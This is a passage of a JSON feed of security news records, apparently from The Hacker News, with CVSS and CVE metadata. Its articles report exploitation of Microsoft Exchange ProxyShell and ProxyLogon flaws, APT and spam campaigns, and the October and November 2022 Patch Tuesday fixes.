", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T10:00:00", "type": "thn", "title": "New Incident Report Reveals How Hive Ransomware Targets Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-04-21T10:00:58", "id": "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "href": "https://thehackernews.com/2022/04/new-incident-report-reveals-how-hive.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:05", "description": "Threat actors are exploiting ProxyLogon and ProxyShell exploits in unpatched 
Microsoft Exchange Servers as part of an ongoing spam campaign that leverages stolen email chains to bypass security software and deploy malware on vulnerable systems.\n\nThe findings come from Trend Micro following an investigation into a number of intrusions in the Middle East that culminated in the distribution of a never-before-seen loader dubbed SQUIRRELWAFFLE. First publicly [documented](<https://thehackernews.com/2021/10/hackers-using-squirrelwaffle-loader-to.html>) by Cisco Talos, the attacks are believed to have commenced in mid-September 2021 via laced Microsoft Office documents.\n\n\"It is known for sending its malicious emails as replies to pre-existing email chains, a tactic that lowers a victim's guard against malicious activities,\" researchers Mohamed Fahmy, Sherif Magdy, and Abdelrhman Sharshar [said](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) in a report published last week. \"To be able to pull this off, we believe it involved the use of a chain of both ProxyLogon and ProxyShell exploits.\"\n\n[ProxyLogon](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) and [ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>) refer to a collection of flaws in Microsoft Exchange Servers that could enable a threat actor to elevate privileges and remotely execute arbitrary code, effectively granting the ability to take control of the vulnerable machines. 
While the ProxyLogon flaws were addressed in March, the ProxyShell bugs were patched in a series of updates released in May and July.\n\n_DLL infection flow_\n\nTrend Micro said it observed the use of public exploits for CVE-2021-26855 (ProxyLogon), CVE-2021-34473, and CVE-2021-34523 (ProxyShell) on three of the Exchange servers that were compromised in different intrusions, using the access to hijack legitimate email threads and send malicious spam messages as replies, thereby increasing the likelihood that unsuspecting recipients will open the emails.\n\n\"Delivering the malicious spam using this technique to reach all the internal domain users will decrease the possibility of detecting or stopping the attack, as the mail gateways will not be able to filter or quarantine any of these internal emails,\" the researchers said, adding the attackers behind the operation did not carry out lateral movement or install additional malware so as to stay under the radar and avoid triggering any alerts.\n\nThe attack chain involves rogue email messages containing a link that, when clicked, drops a Microsoft Excel or Word file. 
Opening the document, in turn, prompts the recipient to enable macros, ultimately leading to the download and execution of the SQUIRRELWAFFLE malware loader, which acts as a medium to fetch final-stage payloads such as Cobalt Strike and Qbot.\n\nThe development marks a new escalation in phishing campaigns where a threat actor has breached corporate Microsoft Exchange email servers to gain unauthorized access to their internal mail systems and distribute malicious emails in an attempt to infect users with malware.\n\n\"SQUIRRELWAFFLE campaigns should make users wary of the different tactics used to mask malicious emails and files,\" the researchers concluded. \"Emails that come from trusted contacts may not be enough of an indicator that whatever link or file included in the email is safe.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-22T11:47:00", "type": "thn", "title": "Hackers Exploiting ProxyLogon and ProxyShell Flaws in Spam Campaigns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-23T07:33:36", "id": "THN:0D80EEB03C07D557AA62E071C7A7C619", "href": "https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:24", "description": "The U.S. Cybersecurity and Infrastructure Security Agency is warning of active exploitation attempts that leverage the latest line of \"**ProxyShell**\" Microsoft Exchange vulnerabilities that were patched earlier this May, including deploying LockFile ransomware on compromised systems.\n\nTracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, the vulnerabilities enable adversaries to bypass ACL controls and elevate privileges on the Exchange PowerShell backend, effectively permitting the attacker to perform unauthenticated remote code execution. 
While the former two were addressed by Microsoft on April 13, a patch for CVE-2021-31207 was shipped as part of the Windows maker's May Patch Tuesday updates.\n\n\"An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine,\" CISA [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>).\n\nThe development comes a little over a week after cybersecurity researchers sounded the alarm on [opportunistic scanning and exploitation](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) of unpatched Exchange servers by taking advantage of the ProxyShell attack chain.\n\n_Image Source: [Huntress Labs](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>)_\n\nOriginally demonstrated at the [Pwn2Own hacking contest](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) in April this year, ProxyShell is part of a broader trio of exploit chains discovered by DEVCORE security researcher Orange Tsai that includes ProxyLogon and ProxyOracle, the latter of which concerns two remote code execution flaws that could be employed to recover a user's password in plaintext format.\n\n\"They're backdooring boxes with webshells that drop other webshells and also executables that periodically call out,\" researcher Kevin Beaumont [noted](<https://twitter.com/GossiTheDog/status/1425844380376735746>) last week.\n\nNow according to researchers from Huntress Labs, at least [five distinct styles of web shells](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) have been observed as 
deployed to vulnerable Microsoft Exchange servers, with over 100 incidents reported related to the exploit between August 17 and 18. Web shells grant the attackers remote access to the compromised servers, but it isn't clear exactly what the goals are or the extent to which all the flaws were used.\n\nMore than 140 web shells have been detected across no fewer than 1,900 unpatched Exchange servers to date, Huntress Labs CEO Kyle Hanslovan [tweeted](<https://twitter.com/KyleHanslovan/status/1428804893423382532>), adding \"impacted [organizations] thus far include building manufacturing, seafood processors, industrial machinery, auto repair shops, a small residential airport and more.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-22T09:51:00", "type": "thn", "title": "WARNING: Microsoft Exchange Under Attack With ProxyShell Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-23T13:28:25", "id": "THN:5BE77895D84D1FB816C73BB1661CE8EB", "href": "https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-12T08:05:16", "description": "Microsoft's Patch Tuesday update for the month of October has addressed a total of [85 security vulnerabilities](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Oct>), including fixes for an actively exploited zero-day flaw in the wild.\n\nOf the 85 bugs, 15 are rated Critical, 69 are rated Important, and one is rated Moderate in severity. 
The update, however, does not include mitigations for the [actively exploited](<https://unit42.paloaltonetworks.com/proxynotshell-cve-2022-41040-cve-2022-41082/>) [ProxyNotShell](<https://thehackernews.com/2022/10/microsoft-issues-improved-mitigations.html>) flaws in [Exchange Server](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-october-2022-exchange-server-security-updates/ba-p/3646263>).\n\nThe [patches](<https://www.rapid7.com/blog/post/2022/10/11/patch-tuesday-october-2022/>) come alongside [updates to resolve 12 other flaws](<https://learn.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in the Chromium-based Edge browser that have been released since the beginning of the month.\n\nTopping the list of this month's patches is [CVE-2022-41033](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41033>) (CVSS score: 7.8), a privilege escalation vulnerability in Windows COM+ Event System Service. An anonymous researcher has been credited with reporting the issue.\n\n\"An attacker who successfully exploited this vulnerability could gain SYSTEM privileges,\" the company said in an advisory, cautioning that the shortcoming is being actively weaponized in real-world attacks.\n\nThe nature of the flaw also means that the issue is likely chained with other flaws to escalate privilege and carry out malicious actions on the infected host.\n\n\"This specific vulnerability is a local privilege escalation, which means that an attacker would already need to have code execution on a host to use this exploit,\" Kev Breen, director of cyber threat research at Immersive Labs, said.\n\nThree other elevation of privilege vulnerabilities of note relate to Windows Hyper-V ([CVE-2022-37979](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37979>), CVSS score: 7.8), Active Directory Certificate Services ([CVE-2022-37976](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37976>), CVSS score: 8.8), and Azure 
Arc-enabled Kubernetes cluster Connect ([CVE-2022-37968](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37968>), CVSS score: 10.0).\n\nDespite the \"Exploitation Less Likely\" tag for CVE-2022-37968, Microsoft noted that a successful exploitation of the flaw could permit an \"unauthenticated user to elevate their privileges as cluster admins and potentially gain control over the Kubernetes cluster.\"\n\nElsewhere, [CVE-2022-41043](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41043>) (CVSS score: 3.3) \u2013 an information disclosure vulnerability in Microsoft Office \u2013 is listed as publicly known at the time of release. It could be exploited to leak user tokens and other potentially sensitive information, Microsoft said.\n\nAlso fixed by Redmond are eight privilege escalation flaws in Windows Kernel, 11 remote code execution bugs in Windows Point-to-Point Tunneling Protocol and SharePoint Server, and yet another elevation of privilege vulnerability in the Print Spooler module ([CVE-2022-38028](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38028>), CVSS score: 7.8).\n\nLastly, the Patch Tuesday update further addresses two more privilege escalation flaws in Windows Workstation Service ([CVE-2022-38034](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38034>), CVSS score: 4.3) and Server Service Remote Protocol ([CVE-2022-38045](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38045>), CVSS score: 8.8).\n\nWeb security company Akamai, which discovered the two shortcomings, [said](<https://www.akamai.com/blog/security-research/cold-hard-cache-bypassing-rpc-with-cache-abuse>) they \"take advantage of a design flaw that allows the bypass of [Microsoft [Remote Procedure Call](<https://learn.microsoft.com/en-us/windows/win32/rpc/rpc-start-page>)] security [callbacks](<https://learn.microsoft.com/en-us/windows/win32/rpc/callbacks>) through caching.\"\n\n### Software Patches from Other 
Vendors\n\nIn addition to Microsoft, security updates have also been released by several vendors to rectify dozens of vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [Android](<https://source.android.com/security/bulletin/2022-10-01>)\n * [Apache Projects](<https://news.apache.org/foundation/entry/the-apache-news-round-up276>)\n * [Apple](<https://support.apple.com/en-us/HT213480>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [CODESYS](<https://www.codesys.com/security/security-reports.html>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [F5](<https://support.f5.com/csp/new-updated-articles>)\n * [Fortinet](<https://www.fortiguard.com/psirt?date=10-2022>) (including an [actively exploited flaw](<https://thehackernews.com/2022/10/fortinet-warns-of-active-exploitation.html>))\n * [GitLab](<https://about.gitlab.com/releases/2022/10/03/gitlab-15-4-2-released/>)\n * [Google Chrome](<https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_11.html>)\n * [IBM](<https://www.ibm.com/blogs/psirt/>)\n * [Lenovo](<https://support.lenovo.com/us/en/product_security/ps500001-lenovo-product-security-advisories>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/October-2022>)\n * [NVIDIA](<https://www.nvidia.com/en-us/security/>)\n * 
[Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/october-2022-bulletin.html>)\n * [Samba](<https://www.samba.org/samba/history/>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n * [Trend Micro](<https://success.trendmicro.com/dcx/s/vulnerability-response?language=en_US>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-12T07:07:00", "type": "thn", "title": "Microsoft Patch Tuesday Fixes New Windows Zero-Day; No Patch for Exchange Server Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-37968", "CVE-2022-37976", "CVE-2022-37979", "CVE-2022-38028", "CVE-2022-38034", "CVE-2022-38045", "CVE-2022-41033", "CVE-2022-41040", "CVE-2022-41043", "CVE-2022-41082"], "modified": "2022-10-12T07:07:54", "id": "THN:0521233945B9471C64D546BD2B006823", "href": "https://thehackernews.com/2022/10/microsoft-patch-tuesday-fixes-new.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-09T12:37:14", "description": 
"A previously undocumented threat actor has been identified as behind a string of attacks targeting fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan with the goal of stealing data from compromised networks.\n\nCybersecurity company Positive Technologies dubbed the advanced persistent threat (APT) group ChamelGang \u2014 referring to their chameleonic capabilities, including disguising \"its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google.\" \n\n\"To achieve their goal, the attackers used a trending penetration method\u2014supply chain,\" the researchers [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-uncovers-new-apt-group-attacking-russia-s-fuel-and-energy-complex-and-aviation-production-industry/>) of one of the incidents investigated by the firm. \"The group compromised a subsidiary and penetrated the target company's network through it. Trusted relationship attacks are rare today due to the complexity of their execution. 
Using this method [\u2026], the ChamelGang group was able to achieve its goal and steal data from the compromised network.\"\n\nIntrusions mounted by the adversary are believed to have commenced at the end of March 2021, with later attacks in August leveraging what's called the [ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) chain of vulnerabilities affecting Microsoft Exchange Servers, the technical details of which were first revealed at the Black Hat USA 2021 security conference earlier that month.\n\nThe attack in March is also notable for the fact that the operators breached a subsidiary organization to gain access to an unnamed energy company's network by exploiting a flaw in Red Hat JBoss Enterprise Application ([CVE-2017-12149](<https://access.redhat.com/security/cve/CVE-2017-12149>)) to remotely execute commands on the host and deploy malicious payloads that enable the actor to launch the malware with elevated privileges, laterally pivot across the network, and perform reconnaissance, before deploying a backdoor called DoorMe.\n\n\"The infected hosts were controlled by the attackers using the public utility FRP (fast reverse proxy), written in Golang,\" the researchers said. \"This utility allows connecting to a reverse proxy server. 
The attackers' requests were routed using the socks5 plugin through the server address obtained from the configuration data.\"\n\nOn the other hand, the August attack against a Russian company in the aviation production sector involved the exploitation of ProxyShell flaws (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) to drop additional web shells and conduct remote reconnaissance on the compromised node, ultimately leading to the installation of a modified version of the DoorMe implant that comes with expanded capabilities to run arbitrary commands and carry out file operations.\n\n\"Targeting the fuel and energy complex and aviation industry in Russia isn't unique \u2014 this sector is one of the three most frequently attacked,\" Positive Technologies' Head of Threat Analysis, Denis Kuvshinov, said. \"However, the consequences are serious: Most often such attacks lead to financial or data loss\u2014in 84% of all cases last year, the attacks were specifically created to steal data, and that causes major financial and reputational damage.\"\n"
, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-04T12:48:00", "type": "thn", "title": "A New APT Hacking Group Targeting Fuel, Energy, and Aviation Industries", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-04T12:48:16", "id": "THN:E95B6A75073DA71CEC73B2E4F0B13622", "href": "https://thehackernews.com/2021/10/a-new-apt-hacking-group-targeting-fuel.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:05", "description": "Cybersecurity agencies from Australia, the U.K., and the 
U.S. on Wednesday [released](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) a joint advisory warning of active exploitation of Fortinet and Microsoft Exchange ProxyShell vulnerabilities by Iranian state-sponsored actors to gain initial access to vulnerable systems for follow-on activities, including data exfiltration and ransomware.\n\nThe threat actor is believed to have leveraged multiple Fortinet FortiOS vulnerabilities dating back to March 2021 as well as a remote code execution flaw affecting Microsoft Exchange Servers since at least October 2021, according to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Australian Cyber Security Centre (ACSC), and the U.K.'s National Cyber Security Centre (NCSC).\n\nThe agencies did not attribute the activities to a specific advanced persistent threat (APT) actor. Targeted victims include Australian organizations and a wide range of entities across multiple U.S. critical infrastructure sectors, such as transportation and healthcare. 
The list of flaws being exploited is below \u2014\n\n * [**CVE-2021-34473**](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) (CVSS score: 9.1) - Microsoft Exchange Server remote code execution vulnerability (aka \"[ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>)\")\n * [**CVE-2020-12812**](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>) (CVSS score: 9.8) - [FortiOS SSL VPN 2FA bypass](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) by changing username case\n * [**CVE-2019-5591**](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>) (CVSS score: 6.5) - FortiGate [default configuration](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) does not verify the LDAP server identity\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - [FortiOS system file leak](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>) through SSL VPN via specially crafted HTTP resource requests\n\nBesides exploiting the ProxyShell flaw to gain access to vulnerable networks, CISA and FBI said they observed the adversary abusing a Fortigate appliance in May 2021 to gain a foothold on a web server hosting the domain for a U.S. municipal government. The next month, the APT actors \"exploited a Fortigate appliance to access environmental control networks associated with a U.S.-based hospital specializing in healthcare for children,\" the advisory said.\n\nThe development marks the second time the U.S. 
government has [alerted](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) of advanced persistent threat groups targeting Fortinet FortiOS servers by leveraging CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591 to compromise systems belonging to government and commercial entities.\n\nAs mitigations, the agencies are recommending that organizations immediately patch software affected by the aforementioned vulnerabilities, enforce data backup and restoration procedures, implement network segmentation, secure accounts with multi-factor authentication, and patch operating systems, software, and firmware as and when updates are released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-17T15:44:00", "type": "thn", "title": "U.S., U.K. 
and Australia Warn of Iranian Hackers Exploiting Microsoft, Fortinet Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-34473"], "modified": "2021-11-22T07:14:13", "id": "THN:C3B82BB0558CF33CFDC326E596AF69C4", "href": "https://thehackernews.com/2021/11/us-uk-and-australia-warn-of-iranian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-21T08:09:51", "description": "Microsoft's latest round of monthly security updates has been released with fixes for [68 vulnerabilities](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Nov>) spanning its software portfolio, including patches for six actively exploited zero-days.\n\n12 of the issues are rated Critical, two are rated High, and 55 are rated Important in severity. 
This also includes the weaknesses that were closed out by [OpenSSL](<https://thehackernews.com/2022/11/just-in-openssl-releases-patch-for-2.html>) the previous week.\n\nAlso separately [addressed](<https://learn.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in Microsoft Edge at the start of the month is an actively exploited flaw in Chromium-based browsers ([CVE-2022-3723](<https://thehackernews.com/2022/10/google-issues-urgent-chrome-update-to.html>)) that was plugged by Google as part of an out-of-band update late last month.\n\n\"The big news is that [two older zero-day CVEs](<https://thehackernews.com/2022/10/microsoft-issues-improved-mitigations.html>) affecting Exchange Server, made public at the end of September, have finally been fixed,\" Greg Wiseman, product manager at Rapid7, said in a statement shared with The Hacker News.\n\n\"Customers are advised to update their [Exchange Server systems](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2022-exchange-server-security-updates/ba-p/3669045>) immediately, regardless of whether any previously recommended mitigation steps have been applied. 
The mitigation rules are no longer recommended once systems have been patched.\"\n\nThe list of actively exploited vulnerabilities, which allow privilege elevation and remote code execution, is as follows -\n\n * [**CVE-2022-41040**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) (CVSS score: 8.8) - Microsoft Exchange Server Elevation of Privilege Vulnerability (aka ProxyNotShell)\n * [**CVE-2022-41082**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41082>) (CVSS score: 8.0) - Microsoft Exchange Server Remote Code Execution Vulnerability (aka ProxyNotShell)\n * [**CVE-2022-41128**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41128>) (CVSS score: 8.8) - Windows Scripting Languages Remote Code Execution Vulnerability\n * [**CVE-2022-41125**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41125>) (CVSS score: 7.8) - Windows CNG Key Isolation Service Elevation of Privilege Vulnerability\n * [**CVE-2022-41073**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41073>) (CVSS score: 7.8) - Windows Print Spooler Elevation of Privilege Vulnerability\n * [**CVE-2022-41091**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41091>) (CVSS score: 5.4) - Windows Mark of the Web Security Feature Bypass Vulnerability\n\nBeno\u00eet Sevens and Cl\u00e9ment Lecigne of Google's Threat Analysis Group (TAG) have been credited with reporting CVE-2022-41128, which resides in the JScript9 component and occurs when a target is tricked into visiting a specially crafted website.\n\nCVE-2022-41091 is one of the [two security bypass flaws](<https://thehackernews.com/2022/10/unofficial-patch-released-for-new.html>) in Windows Mark of the Web (MoTW) that came to light over the past few months. 
It was recently found to have been weaponized by the Magniber ransomware actor to target users with fake software updates.\n\n\"An attacker can craft a malicious file that would evade Mark of the Web (MotW) defenses, resulting in a limited loss of integrity and availability of security features such as Protected View in Microsoft Office, which rely on MotW tagging,\" Microsoft said in an advisory.\n\nThe second MotW flaw to be resolved is [CVE-2022-41049](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41049>) (aka [ZippyReads](<https://twitter.com/wdormann/status/1590044005395357697>)). Reported by Analygence security researcher Will Dormann, it [relates](<https://breakdev.org/zip-motw-bug-analysis/>) to a failure to set the Mark of the Web flag on extracted archive files.\n\nThe two privilege escalation flaws in Print Spooler and the [CNG Key Isolation Service](<https://learn.microsoft.com/en-us/windows/win32/seccng/key-storage-and-retrieval>) are likely to be abused by threat actors as a follow-up to an initial compromise to gain SYSTEM privileges, Kev Breen, director of cyber threat research at Immersive Labs, said.\n\n\"This higher level of access is required to disable or tamper with security monitoring tools before running credential attacks with tools like Mimikatz that can allow attackers to move laterally across a network,\" Breen added.\n\nFour other Critical-rated vulnerabilities in the November patch worth pointing out are privilege elevation flaws in Windows [Kerberos](<https://support.microsoft.com/en-us/topic/kb5020805-how-to-manage-kerberos-protocol-changes-related-to-cve-2022-37967-997e9acc-67c5-48e1-8d0d-190269bf4efb>) ([CVE-2022-37967](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37967>)), [Kerberos RC4-HMAC](<https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d>) 
